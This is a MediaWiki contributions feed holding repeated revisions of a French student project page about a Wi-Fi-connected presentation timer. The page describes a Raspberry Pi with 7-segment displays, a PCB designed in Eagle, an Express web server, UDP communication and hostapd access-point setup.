https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=McreteurWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-04-24T12:49:24ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49619P4 IOT 20182019-01-26T18:41:12Z<p>Mcreteur : /* Documents rendus */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finalisé le programme de la Raspberry et installé les librairies permettant d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est créée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initiale et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parsé en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoi et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieures à 99 secondes en minutes et celle inférieures à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiné les deux programmes, et automatisé leur lancement. Nous avons créé un script shell qui lance le serveur web, puis dans une boucle infinie lance le Timer puis supprime les fichiers .json du controller du serveur web à la fin de chaque timer. Ce script a été mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancé à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également soudé une partie de nos composants pour faire des tests. Le test de la partie électronique à révélé un comportement anormal du circuit : des segments de leds restent allumés sans qu'aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assurés de corriger toutes les erreurs de soudure/contact mais nous n'avons pas pu trouver la source du problème. L’hypothèse qui a été émise est que la carte n'aillant pas été nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et que donc le potentiel entre deux points reliés n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculé par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]<br />
<br />
=Documents rendus=<br />
<br />
* [[Fichier:Timer IOT Web.zip]]<br />
* https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
* [[Media:CarteElectroniqueIOTp4.zip|Fichiers carte électronique]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:CarteElectroniqueIOTp4.zip&diff=49618Fichier:CarteElectroniqueIOTp4.zip2019-01-26T18:38:18Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49617P4 IOT 20182019-01-26T18:33:18Z<p>Mcreteur : /* Documents rendus */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finalisé le programme de la Raspberry et installé les librairies permettant d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est créée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initiale et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parsé en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoi et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieures à 99 secondes en minutes et celle inférieures à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiné les deux programmes, et automatisé leur lancement. Nous avons créé un script shell qui lance le serveur web, puis dans une boucle infinie lance le Timer puis supprime les fichiers .json du controller du serveur web à la fin de chaque timer. Ce script a été mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancé à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également soudé une partie de nos composants pour faire des tests. Le test de la partie électronique à révélé un comportement anormal du circuit : des segments de leds restent allumés sans qu'aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assurés de corriger toutes les erreurs de soudure/contact mais nous n'avons pas pu trouver la source du problème. L’hypothèse qui a été émise est que la carte n'aillant pas été nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et que donc le potentiel entre deux points reliés n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculé par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]<br />
<br />
=Documents rendus=<br />
<br />
* [[Fichier:Timer IOT Web.zip]]<br />
* https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49616P4 IOT 20182019-01-26T18:32:40Z<p>Mcreteur : /* Séance 6 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
